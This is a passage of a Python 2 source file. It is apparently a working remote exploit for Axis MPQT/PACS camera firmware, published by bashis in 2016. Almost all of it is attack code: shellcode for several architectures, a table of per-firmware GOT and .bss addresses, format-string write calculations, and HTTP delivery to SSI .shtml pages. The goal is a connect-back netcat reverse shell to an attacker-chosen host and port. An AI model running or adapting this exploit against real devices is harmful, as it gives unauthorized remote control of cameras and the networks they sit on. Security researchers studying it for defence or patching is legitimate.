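		"%7c%86"		# clear.d $r12
		"%4b%92"		# moveq 11,$r9
		"%3d%e9"		# break 13
			])

		# Dispatch by name; NCSH1 and NCSH2 deliberately share one payload.
		payloads = {
			'MIPSel': MIPSel,
			'ARMel': ARMel,
			'CRISv32': CRISv32,
			'NCSH1': NCSH,
			'NCSH2': NCSH,
		}
		if self.target not in payloads:
			print("[!] Unknown shellcode! (%s)" % str(self.target))
			sys.exit(1)
		return payloads[self.target]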


class FMSdb:
	"""Per-firmware format-string parameters ("FMS keys").

	Every entry of the table is a positional list:

	  [0]  address of free()'s GOT slot - the pointer that gets overwritten
	  [1]  where that pointer is redirected: the .bss shellcode buffer for the
	       MIPS/CRISv32/ARMel entries, the "/bin/sh -c ..." code path for the
	       ARM-NCSH entries
	  [2:] POP counts and, for the shellcode entries, the alignment prefix and
	       the size of the buffer placed before the shellcode (see the field
	       comments in the table)
	  [-1] shellcode type, a key understood by shellcode_db.sc()

	FMSkey() validates the requested key but returns the whole table; callers
	index it themselves.  Passing 0 skips the validation.
	"""

	def __init__(self,targetIP,verbose):
		self.targetIP = targetIP
		self.verbose = verbose

	def _table(self):
		"""Build the FMS key table.

		A new dict (with new lists) is built on every call, so whatever a
		caller does to the returned table does not leak into the next call.
		"""
		return {

#-----------------------------------------------------------------------
# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)
#-----------------------------------------------------------------------

#
# Using POP format string, AKA 'Old Style'
#
		# MPQT
		'MIPS-5.85.x':	 [
				0x41f370,	# Adjust to GOT free() address
				0x420900,	# .bss shellcode address
				2,		# 1st POP's
				2,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.40.3': [
				0x41e41c,	# Adjust to GOT free() address
				0x4208cc,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'ax',		# Aligns injected code
				450,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.4x': [
				0x41e4cc,	# Adjust to GOT free() address
				0x42097c,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'ax',		# Aligns injected code
				450,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.5x': [
				0x41d11c,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				5,		# 1st POP's
				15,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.55x': [
				0x41d11c,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				11,		# 1st POP's
				9,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# Shared with MPQT and PACS
		'MIPS-5.6x': [
				0x41d048,	# Adjust to GOT free() address
				0x41f728,	# .bss shellcode address
				5,		# 1st POP's
				15,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.7x': [
				0x41d04c,	# Adjust to GOT free() address
				0x41f718,	# .bss shellcode address
				2,		# 1st POP's
				14,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.75x': [
				0x41c498,	# Adjust to GOT free() address
				0x41daf0,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# Shared with MPQT and PACS
		'MIPS-5.8x': [
				0x41d0c0,	# Adjust to GOT free() address
				0x41e740,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-5.9x': [
				0x41d0c0,	# Adjust to GOT free() address
				0x41e750,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.1x': [
				0x41c480,	# Adjust to GOT free() address
				0x41dac0,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.2x': [
				0x41e578,	# Adjust to GOT free() address
				0x41fae0,	# .bss shellcode address
				2,		# 1st POP's
				2,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# MPQT
		'MIPS-6.20x': [
				0x41d0c4,	# Adjust to GOT free() address
				0x41e700,	# .bss shellcode address
				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# PACS
		'MIPS-1.3x': [
				0x41e4cc,	# Adjust to GOT free() address
				0x420a78,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# PACS
		'MIPS-1.1x': [
				0x41e268,	# Adjust to GOT free() address
				0x420818,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' entries are not used by the exploit, but are kept as
# reference as they have been confirmed working.
#

		# ARMel with bin/libs executable stack flag set with 'execstack'
		# MPQT
		'ARM-5.50x': [
				0x1c1b4,	# Adjust to GOT free() address
				0x1e7c8,	# .bss shellcode address
				93,		# 1st POP's
				1,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'ARMel'		# Shellcode type (ARMel)
		],

		# ARMel with bin/libs executable stack flag set with 'execstack'
		# MPQT
		'ARM-5.55x': [
				0x1c15c,	# Adjust to GOT free() address
				0x1e834,	# .bss shellcode address
				59,		# 1st POP's
				80,		# 2nd POP's
				'axis',		# Aligns injected code
				800,		# How big buffer before shellcode
				'ARMel'		# Shellcode type (ARMel)
		],

#
# Using direct parameter access format string, AKA 'New Style'
#
		# MPQT
		'ARM-NCSH-5.20x': [		# AXIS P1311 5.20 (id=root)
				0x1c1b4,	# Adjust to GOT free() address
				0x10178,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.2x': [
				0x1c1b4,	# Adjust to GOT free() address
				0x1013c,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.4x': [
				0x1c1b4,	# Adjust to GOT free() address
				0x101fc,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],
#
# Using POP format string, AKA 'Old Style'
#

		# MPQT
		'ARM-NCSH-5.5x': [
				0x1c15c,	# Adjust to GOT free() address
				0xfdcc,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				97,		# 1st POP's
				0,		# 2nd POP's
				41,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.6x': [
				0x1c15c,	# Adjust to GOT free() address
				0xfcec,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				97,		# 1st POP's
				0,		# 2nd POP's
				41,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.7x': [
				0x1c1c0,	# Adjust to GOT free() address
				0xf800,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				132,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# Will go in endless loop after exit of nc shell... DoS sux
		# MPQT
		'ARM-NCSH-5.8x': [
				0x1b39c,	# Adjust to GOT free() address
				0xf8c0,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				98,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				1,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-6.1x': [
				0x1d2a4,	# Adjust to GOT free() address
				0xecc8,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()" (0xecc4 was tried first)
				106,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				1,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],
#
# Using POP format string, AKA 'Old Style'
#

		# MPQT
		'CRISv32-5.5x': [
				0x8d148,	# Adjust to GOT free() address
				0x8f5a8,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.4x': [
				0x8d0e0,	# Adjust to GOT free() address
				0x8f542,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.2x': [
				0x8d0b4,	# Adjust to GOT free() address
				0x8f4d6,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.20.0': [
				0x8d0e4,	# Adjust to GOT free() address
				0x8f546,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		}

	def FMSkey(self,target):
		"""Return the key table after checking that *target* is a known key.

		target == 0 returns the table without any check; an unknown key
		prints a message and exits the process with status 1.
		"""
		self.target = target
		table = self._table()

		if self.target == 0:
			return table

		if self.target not in table:
			print("[!] Unknown FMS key: %s!" % self.target)
			sys.exit(1)

		if self.verbose:
			print("[Verbose] Number of availible FMS keys: %d" % len(table))

		return table


#
# Validate correctness of HOST, IP and PORT
#
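class Validate:
	"""Validate the HOST/IP/PORT values given on the command line.

	The main block uses this to reject bad --rhost/--rport/--lhost/--lport
	values before anything is sent over the network. The checked value is
	also stored on the instance (self.IP / self.PORT / self.HOST) as the
	original implementation did.
	"""

	def __init__(self,verbose):
		self.verbose = verbose

	# Check if IP is valid
	def CheckIP(self,IP):
		"""Return True if IP is a dotted quad with every octet in 0..255.

		Every octet is range-checked. (Previously the range check sat outside
		the loop, so only the last octet was checked and e.g. '300.1.1.1'
		was accepted.)
		"""
		self.IP = IP

		octets = self.IP.split('.')
		if len(octets) != 4:
			return False
		for octet in octets:
			# isdigit() rejects empty fields, signs and whitespace, so a
			# negative value can never reach the range check
			if not octet.isdigit():
				return False
			if int(octet) > 255:
				return False
		return True

	# Check if PORT is valid
	def Port(self,PORT):
		"""Return True if PORT converts to an integer in 1..65535, else False.

		Non-numeric input yields False instead of propagating ValueError, so
		the caller's "[!] Invalid ... PORT" message is what the user sees.
		"""
		self.PORT = PORT

		try:
			port = int(self.PORT)
		except (TypeError, ValueError):
			return False
		return 1 <= port <= 65535

	# Check if HOST is valid
	def Host(self,HOST):
		"""Resolve HOST to a dotted-quad IPv4 string, or return False.

		A literal IP is accepted only if both inet_aton() and CheckIP() agree,
		so abbreviated forms such as '10.1' are rejected. Anything else is
		treated as a DNS name and resolved with gethostbyname() (a live DNS
		lookup); a failed lookup returns False.
		"""
		self.HOST = HOST

		try:
			# Raises socket.error for a FQDN or a malformed IP
			socket.inet_aton(self.HOST)
		except socket.error:
			# Not a literal IP: fall back to DNS and use the resolved address
			try:
				self.HOST = socket.gethostbyname(self.HOST)
			except socket.error:
				return False
			return self.HOST

		# inet_aton is permissive; insist on a strictly typed dotted quad
		if self.CheckIP(self.HOST):
			return self.HOST
		return False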



if __name__ == '__main__':

#
# Help, info and pre-defined values
#	
# NOTE(review): this is Python 2 code (print statements, urllib2); it will not run
# unmodified under Python 3.
	INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
	HTTP = "http"
	HTTPS = "https"
	proto = HTTP
	verbose = False
	noexploit = False
	# Hard-coded fallbacks, overridden by --lhost/--lport/--rhost/--rport below
	lhost = '192.168.0.1'	# Default Local HOST
	lport = '31337'		# Default Local PORT
	rhost = '192.168.0.90'	# Default Remote HOST
	rport = '80'		# Default Remote PORT
	#  Not needed for the SSI exploit, here for possible future usage.
#	creds = 'root:pass'
	creds = False

#
# Try to parse all arguments
#
	# argparse reports bad arguments by raising SystemExit (a BaseException), which the
	# "except Exception" below does not catch; that handler only covers parser construction.
	try:
		arg_parser = argparse.ArgumentParser(
#		prog=sys.argv[0],
		prog='axis-ssid-PoC.py',
                description=('[*]' + INFO + '\n'))
		arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
		arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
		arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
		arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
		arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
		# --auth only exists when creds is truthy; with creds = False above it is never registered
		if creds:
			arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
		arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
		arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
		arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
		arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
		args = arg_parser.parse_args()
	except Exception as e:
		print INFO,"\nError: %s\n" % str(e)
		sys.exit(1)

	# We want at least one argument, so print out help
	# (parse_args(['-h']) prints the help text and exits via SystemExit)
	if len(sys.argv) == 1:
		arg_parser.parse_args(['-h'])

	print "\n[*]",INFO

	if args.verbose:
		verbose = args.verbose

	# Print out info from dictionary
	if args.dict:
		# FMSkey(0) returns the whole dictionary instead of a single entry
		target = FMSdb(rhost,verbose).FMSkey(0)
		print "[db] Number of FMS keys:",len(target)

		# Print out detailed info from dictionary
		if verbose:

			print "[db] Target details of FMS Keys availible for manual xploiting"
			print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"

			# The key list is re-sorted on every iteration; harmless for a table this size
			for tmp in range(0,len(target)):
				Key = sorted(target.keys())[tmp]
				temp = re.split('[-]',Key)[0:10]

				if temp[1] == 'NCSH':
					print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]

			print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
			for tmp in range(0,len(target)):
				Key = sorted(target.keys())[tmp]
				temp = re.split('[-]',Key)[0:10]

				if temp[1] != 'NCSH':
					print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]

			print "\n"
		else:
			print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
			Key = ""
			for tmp in range(0,len(target)):
				Key += sorted(target.keys())[tmp]
				Key += ', '
			print '\n',Key,'\n'
		sys.exit(0)

#
# Check validity, update if needed, of provided options
#
	if args.https:
		proto = HTTPS
		if not args.rport:
			rport = '443'

	if creds and args.auth:
		creds = args.auth

	if args.noexploit:
		noexploit = args.noexploit

	if args.rport:
		rport = args.rport

	if args.rhost:
		rhost = args.rhost

	if args.lport:
		lport = args.lport

	if args.lhost:
		lhost = args.lhost

	# Check if LPORT is valid
	if not Validate(verbose).Port(lport):
		print "[!] Invalid LPORT - Choose between 1 and 65535"
		sys.exit(1)

	# Check if RPORT is valid
	if not Validate(verbose).Port(rport):
		print "[!] Invalid RPORT - Choose between 1 and 65535"
		sys.exit(1)

	# Check if LHOST is valid IP or FQDN, get IP back
	# (Host() returns the dotted-quad string, or False; the result replaces the
	# user-supplied value, so lhost is a plain IPv4 string from here on)
	lhost = Validate(verbose).Host(lhost)
	if not lhost:
		print "[!] Invalid LHOST"
		sys.exit(1)

	# Check if RHOST is valid IP or FQDN, get IP back
	rhost = Validate(verbose).Host(rhost)
	if not rhost:
		print "[!] Invalid RHOST"
		sys.exit(1)


#
# Validation done, start print out stuff to the user
#
	if noexploit:
		print "[i] Test mode selected, no exploiting..."
	if args.https:
		print "[i] HTTPS / SSL Mode Selected"
	print "[i] Remote target IP:",rhost
	print "[i] Remote target PORT:",rport
	print "[i] Connect back IP:",lhost
	print "[i] Connect back PORT:",lport

	# From here on rhost carries "host:port" (this is what FMSdb/HTTPconnect receive)
	rhost = rhost + ':' + rport

#
# FMS key is required into this PoC
#
	if not args.fms:
		print "[!] FMS key is required!"
		sys.exit(1)
	else:
		Key = args.fms
		print "[i] Trying with FMS key:",Key

#
# Prepare exploiting
#
	# Look up the FMS key in dictionary and return pointer for FMS details to use
	# (FMSkey() exits the program itself if Key is unknown)
	target = FMSdb(rhost,verbose).FMSkey(Key)

	# target[Key][6] is the shellcode type. NCSH1/NCSH2 select the two netcat-shell
	# variants; any other value takes the encoded-shellcode path below.
	if target[Key][6] == 'NCSH1':
		NCSH1 = target[Key][6]
		NCSH2 = ""
	elif target[Key][6] == 'NCSH2':
		NCSH2 = target[Key][6]
		NCSH1 = ""
	else:
		NCSH1 = ""
		NCSH2 = ""
	
	# This key is deliberately refused; exits before anything is sent
	if Key == 'ARM-NCSH-5.8x':
		print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
		sys.exit(0)

	print "[i] Preparing shellcode:",str(target[Key][6])

	# We don't use url encoded shellcode with Netcat shell
	# This is for MIPS/CRISv32 and ARM shellcode
	if not NCSH1 and not NCSH2:
		FMSdata = target[Key][4]		# This entry aligns the injected shellcode

		# Building up the url encoded shellcode for sending to the target,
		# and replacing LHOST / LPORT in shellcode to choosen values
		
		# part of first 500 decoded bytes will be overwritten during stage #2, and since
		# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
		# Let it be 0x00, just for fun.
		FMSdata += '%00' * target[Key][5]

		# Connect back IP to url encoded
		# (lhost is a validated dotted quad at this point, so the split yields exactly four ints)
		ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
		ip_hex = ip_hex.split()
		IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];

		# Let's break apart the hex code of LPORT into two bytes
		# lport was range-checked to 1..65535, so hex() gives 1-4 digits; zfill() makes that
		# 2 or 4, i.e. port_hex ends up with exactly one or two byte groups.
		port_hex = hex(int(lport))[2:]
		port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
		port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
		port_hex = port_hex.split()
	
		# PP0/PP1 are only bound in these branches; the len() == 1 / == 2 cases are exhaustive
		# given the range check above.
		if (target[Key][6]) == 'MIPSel':
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%ff"
				PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%00"
				PP0 = '%{:02x}'.format(int(port_hex[0],16))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format(int(port_hex[0],16))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		elif (target[Key][6]) == 'CRISv32':
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%00"
				PP0 = '%{:02x}'.format(int(port_hex[0],16))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format(int(port_hex[0],16))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		else:
			print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
			sys.exit(1)

		# Replace LHOST / LPORT in URL encoded shellcode
		# (plain substring replacement of the IP1..IP4 / PP0 / PP1 placeholders)
		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("IP1",IP1)
		shell = shell.replace("IP2",IP2)
		shell = shell.replace("IP3",IP3)
		shell = shell.replace("IP4",IP4)
		shell = shell.replace("PP0",PP0)
		shell = shell.replace("PP1",PP1)
		FMSdata += shell

#
# Calculate the FMS values to be used
#
	# Get pre-defined values
	ALREADY_WRITTEN = 40	# Already 'written' in the daemon before our FMS
#	POP_SIZE = 8
	POP_SIZE = 1

	GOThex = target[Key][0]
	BSShex = target[Key][1]
	GOTint = int(GOThex)

	# 'One-Write-Where-And-What'
	if not NCSH1 and not NCSH2:

		POP1 = target[Key][2]
		POP2 = target[Key][3]

		# Calculate for creating the FMS code
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
		GOTint = (GOTint - ALREADY_WRITTEN)
	
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)

		BSSint = int(BSShex)
		BSSint = (BSSint - GOTint - ALREADY_WRITTEN)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint

	# 'Two-Write-Where-And-What' using "New Style"
	elif NCSH2:

		POP1 = target[Key][2]
		POP2 = target[Key][3]
		POP3 = target[Key][4]
		POP4 = target[Key][5]
		# NOTE(review): the next line appears to be indented with a leading space followed by tabs;
		# Python 2 accepts this as equal indentation, Python 3 raises TabError. Confirm in the raw file.
 		POP2_SIZE = 2
		
 		# We need to count higher than provided address for the jump
		BaseAddr = 0x10000 + BSShex
	
		# Calculate for creating the FMS code
		GOTint = (GOTint - ALREADY_WRITTEN)

		ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
		
		# Calculate FirstWhat value
		FirstWhat = BaseAddr - (ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat

		# Calculate SecondWhat value, so it always is 0x20300
		SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)

		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("LHOST",lhost)
		shell = shell.replace("LPORT",lport)

		# The shell text is emitted before the counters in stage two, so its length is subtracted here
		FirstWhat = FirstWhat - len(shell)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
	
	
	# 'Two-Write-Where-And-What' using "Old Style"
	elif NCSH1:

		POP1 = target[Key][2]
		POP2 = target[Key][3]
		POP3 = target[Key][4]
		POP4 = target[Key][5]
		POP2_SIZE = 2

		# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
		# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
		if BSShex > 0x10000:
			MSB = 1
		else:
			MSB = 0

 		# We need to count higher than provided address for the jump
		BaseAddr = 0x10000 + BSShex

		# Calculate for creating the FMS code
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
		
		GOTint = (GOTint - ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
		
		# Calculate FirstWhat value
		FirstWhat = BaseAddr - (ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)

		# Calculate SecondWhat value, so it always is 0x203[00] or [01]
		SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB

		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("LHOST",lhost)
		shell = shell.replace("LPORT",lport)

		GOTint = GOTint - len(shell)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
	
	# Unreachable: the three branches above cover every NCSH1/NCSH2 combination
	else:
		print "[!] NCSH missing, exiting"
		sys.exit(1)
#
# Let's start the exploiting procedure
#

#
# Stage one
#
	if NCSH1 or NCSH2:

		# "New Style" needs to make the exploit in two stages
		if NCSH2:
			FMScode = do_FMS(rhost,verbose)
			# Writing 'FirstWhere' and 'SecondWhere'
			# 1st request
			FMScode.AddADDR(GOTint) # Run up to free() GOT address
			#
			# 1st and 2nd "Write-Where"
			FMScode.AddDirectParameterN(POP1)	# Write 1st Where
			FMScode.Add("XX")			# Jump up two bytes for next address
			FMScode.AddDirectParameterN(POP2)	# Write 2nd Where
			FMSdata = FMScode.FMSbuild()
		else:
			# NCSH1 sends an empty stage one; it only probes that the .shtml is reachable
			FMSdata = ""

		print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
	else:
		print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))

	# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
	# Actually, any valid and public readable .shtml file will work...
	# (One of the two below seems always to be usable)
	#
	# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
	# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
	#
	# Error handling notes:
	#  - urllib2 is referenced here but imported outside this view; confirm the import exists.
	#  - An HTTPError raised by the retry inside the 404 handler is NOT caught by the sibling
	#    "except Exception" below (handlers do not cover each other) and will propagate.
	#  - For NCSH2 any non-HTTPError failure is swallowed silently and stage two still runs.
	#  - The response body (html) is assigned but never read anywhere in this block.
	try:
		target_url = "/httpDisabled.shtml?user_agent="
		if noexploit:
			target_url2 = target_url
		else:
			target_url2 = "/httpDisabled.shtml?&http_user="

		if NCSH2:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
		else:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
	except urllib2.HTTPError as e:
		if e.code == 404:
			print "[<] Error",e.code,e.reason
			target_url = "/view/viewer_index.shtml?user_agent="
			if noexploit:
				target_url2 = target_url
			else:
				target_url2 = "/view/viewer_index.shtml?&http_user="
			print "[>] Using alternative target shtml"
			if NCSH2:
				html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
			else:
				html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
		# NOTE(review): a non-404 HTTPError falls through here without any message or exit.
	except Exception as e:
		if not NCSH2:
			print "[!] Shellcode delivery failed:",str(e)
			sys.exit(1)
#
# Stage two
#

#
# Building and sending the FMS code to the target
#
	print "[i] Building the FMS code..."

	# Fresh builder; the stage-one FMScode object (NCSH2 only) is discarded here
	FMScode = do_FMS(rhost,verbose)

	# This is an 'One-Write-Where-And-What' for FMS
	#
	# Stack Example:
	#
	# Stack content	|	Stack address (ASLR)
	#
	# 0x0		|	@0x7e818dbc -> [POP1's]
	# 0x0		|	@0x7e818dc0 -> [free () GOT address]
	# 0x7e818dd0	|	@0x7e818dc4>>>>>+ "Write-Where" (%n)
	# 0x76f41fb8	|	@0x7e818dc8     | -> [POP2's]
	# 0x76f3d70c	|	@0x7e818dcc     | -> [BSS shell code address]
	# 0x76f55ab8	|	@0x7e818dd0<<<<<+ "Write-What" (%n)
	# 0x1		|	@0x7e818dd4
	#
	if not NCSH1 and not NCSH2:
		FMScode.AddPOP(POP1)		# 1st serie of 'Old Style' POP's 
		FMScode.AddADDR(GOTint)		# GOT Address
		FMScode.AddWRITEn(1)		# 4 bytes Write-Where
#		FMScode.AddWRITElln(1)		# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

		FMScode.AddPOP(POP2)		# 2nd serie of 'Old Style' POP's
		FMScode.AddADDR(BSSint)		# BSS shellcode address
		FMScode.AddWRITEn(1)		# 4 bytes Write-What
#		FMScode.AddWRITElln(1)		# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

	# End of 'One-Write-Where-And-What'


	# This is an 'Two-Write-Where-And-What' for FMS
	#
	# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
	# We jump over all SSI tagging to end up directly where "xxx" will
	# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
	#
	# The Trick here is to write lower target address, that we will jump to when calling free(),
